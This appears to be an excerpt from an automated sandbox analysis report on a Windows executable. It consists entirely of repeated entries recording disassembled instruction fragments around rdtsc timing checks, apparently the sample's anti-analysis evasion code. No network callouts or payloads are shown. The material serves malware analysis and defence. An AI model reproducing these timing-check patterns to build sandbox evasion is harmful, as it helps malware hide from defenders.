                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11E295E second address: 11E2968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11E2968 second address: 11E297A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FD09CB0C7EEh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11E27C3 second address: 11E27CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11E27CD second address: 11E27D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11E27D3 second address: 11E27E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11E27E4 second address: 11E27E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11E27E9 second address: 11E27EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11F9475 second address: 11F947C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11F9075 second address: 11F9079 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 120D733 second address: 120D744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CB0C7EDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 120D744 second address: 120D748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 120D8F9 second address: 120D907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CB0C7EAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 120D907 second address: 120D923 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD09CF151B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FD09CF151C2h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 120DD55 second address: 120DD5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 120DD5B second address: 120DD61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 120DD61 second address: 120DD65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 120DD65 second address: 120DD6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 120DD6E second address: 120DD74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 120E2CE second address: 120E2EF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD09CF151BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FD09CF151BDh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 120E2EF second address: 120E301 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a ja 00007FD09CB0C7E6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1212542 second address: 1212546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1212923 second address: 121294E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD09CB0C7E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edx, dword ptr [ebp+122D2E95h] 0x00000013 push 00000004h 0x00000015 pushad 0x00000016 add dl, FFFFFF84h 0x00000019 popad 0x0000001a call 00007FD09CB0C7E9h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 121294E second address: 1212954 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1212954 second address: 1212969 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD09CB0C7ECh 0x00000008 jnc 00007FD09CB0C7E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1212C6B second address: 1212CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007FD09CF151C7h 0x0000000c push ebx 0x0000000d jno 00007FD09CF151B6h 0x00000013 pop ebx 0x00000014 popad 0x00000015 nop 0x00000016 push dword ptr [ebp+122D390Eh] 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007FD09CF151B8h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 mov dword ptr [ebp+1245D49Dh], eax 0x0000003c push C7B09500h 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FD09CF151C0h 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1215B9C second address: 1215BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1215BA2 second address: 1215BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007FD09CF151CDh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1215BC4 second address: 1215BEC instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD09CB0C7EEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD09CB0C7F0h 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1215BEC second address: 1215BF2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1217659 second address: 1217668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 jns 00007FD09CB0C7E6h 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1217668 second address: 121766D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1129D2D second address: 1129D46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007FD09CB0C7E6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007FD09CB0C7E6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1129D46 second address: 1129D55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 112A0D5 second address: 112A0D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 51A0680 second address: 51A0686 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 51A0786 second address: 51A07BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushfd 0x0000000c jmp 00007FD09CB0C7EEh 0x00000011 adc ecx, 635A3C18h 0x00000017 jmp 00007FD09CB0C7EBh 0x0000001c popfd 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 51A07BA second address: 51A07C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 51A07C6 second address: 51A082A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FD09CB0C7F8h 0x0000000b jmp 00007FD09CB0C7F5h 0x00000010 popfd 0x00000011 popad 0x00000012 lea eax, dword ptr [ebp-04h] 0x00000015 jmp 00007FD09CB0C7EEh 0x0000001a nop 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007FD09CB0C7F9h 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 51A082A second address: 51A0858 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD09CF151C1h 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 51A0858 second address: 51A085E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 51A085E second address: 51A0873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD09CF151C1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 51A0873 second address: 51A0884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 51A0884 second address: 51A0888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 51A0888 second address: 51A089E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 51A0909 second address: 51A091D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD09CF151C0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 51A091D second address: 51A0968 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [ebp-04h], 00000000h 0x0000000f jmp 00007FD09CB0C7F6h 0x00000014 mov esi, eax 0x00000016 pushad 0x00000017 mov cl, 6Fh 0x00000019 mov esi, edx 0x0000001b popad 0x0000001c je 00007FD09CB0C81Bh 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FD09CB0C7F0h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 51A09A6 second address: 51A09AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 51900DE second address: 51900F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 mov dx, 830Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c sub esp, 2Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push esi 0x00000013 pop edx 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 51900F3 second address: 51900F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 51900F9 second address: 5190130 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FD09CB0C7EEh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD09CB0C7EEh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 51901C8 second address: 51901CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 51901CC second address: 51901E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 51901E8 second address: 51901EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 51901EE second address: 51901F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 51901F2 second address: 5190205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 5190205 second address: 5190209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 5190209 second address: 519020D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 519020D second address: 5190213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 5190213 second address: 5190234 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 mov edi, eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a inc ebx 0x0000000b jmp 00007FD09CF151BEh 0x00000010 test al, al 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 5190234 second address: 5190238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 5190238 second address: 519023E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 519023E second address: 5190244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 51902CE second address: 51902FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 4069E86Dh 0x00000008 mov eax, 70499E69h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 jmp 00007FD09CF151C4h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov al, 11h 0x0000001c movsx ebx, cx 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 51902FD second address: 5190337 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD09CB0C7F1h 0x00000009 add esi, 1293B7D6h 0x0000000f jmp 00007FD09CB0C7F1h 0x00000014 popfd 0x00000015 mov dx, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 5190337 second address: 519033B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 519033B second address: 5190341 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 5190367 second address: 519036D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 519036D second address: 5190463 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FD09CB0C7EEh 0x00000012 or ecx, 26998AB8h 0x00000018 jmp 00007FD09CB0C7EBh 0x0000001d popfd 0x0000001e jmp 00007FD09CB0C7F8h 0x00000023 popad 0x00000024 jg 00007FD10EA0A8B6h 0x0000002a jmp 00007FD09CB0C7F0h 0x0000002f js 00007FD09CB0C81Dh 0x00000035 jmp 00007FD09CB0C7F0h 0x0000003a cmp dword ptr [ebp-14h], edi 0x0000003d pushad 0x0000003e mov cx, 268Dh 0x00000042 mov cx, 9E89h 0x00000046 popad 0x00000047 jne 00007FD10EA0A88Ch 0x0000004d jmp 00007FD09CB0C7F4h 0x00000052 mov ebx, dword ptr [ebp+08h] 0x00000055 jmp 00007FD09CB0C7F0h 0x0000005a lea eax, dword ptr [ebp-2Ch] 0x0000005d pushad 0x0000005e mov dh, ah 0x00000060 pushfd 0x00000061 jmp 00007FD09CB0C7F3h 0x00000066 sub ax, 594Eh 0x0000006b jmp 00007FD09CB0C7F9h 0x00000070 popfd 0x00000071 popad 0x00000072 xchg eax, esi 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 5190463 second address: 5190467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 5190467 second address: 519046D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 519046D second address: 51904CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD09CF151BBh 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FD09CF151C4h 0x00000017 xor si, 9358h 0x0000001c jmp 00007FD09CF151BBh 0x00000021 popfd 0x00000022 mov dx, si 0x00000025 popad 0x00000026 nop 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FD09CF151C1h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 51904CF second address: 51904D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 51904D5 second address: 51904D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 5180DE5 second address: 5180DEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 5180DEB second address: 5180E05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, di 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5180E94 second address: 5180E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, 5B5Eh 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5180E9D second address: 5180EE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD09CF151BDh 0x00000013 and si, 4996h 0x00000018 jmp 00007FD09CF151C1h 0x0000001d popfd 0x0000001e mov ch, 96h 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 519089A second address: 51908A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51908A9 second address: 51908C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD09CF151C4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51908C1 second address: 51908D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51908D9 second address: 51908DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51908DD second address: 51908E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51908E1 second address: 51908E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51908E7 second address: 5190916 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD09CB0C7F8h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f movsx edx, si 0x00000012 mov bl, cl 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 5190916 second address: 519091A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
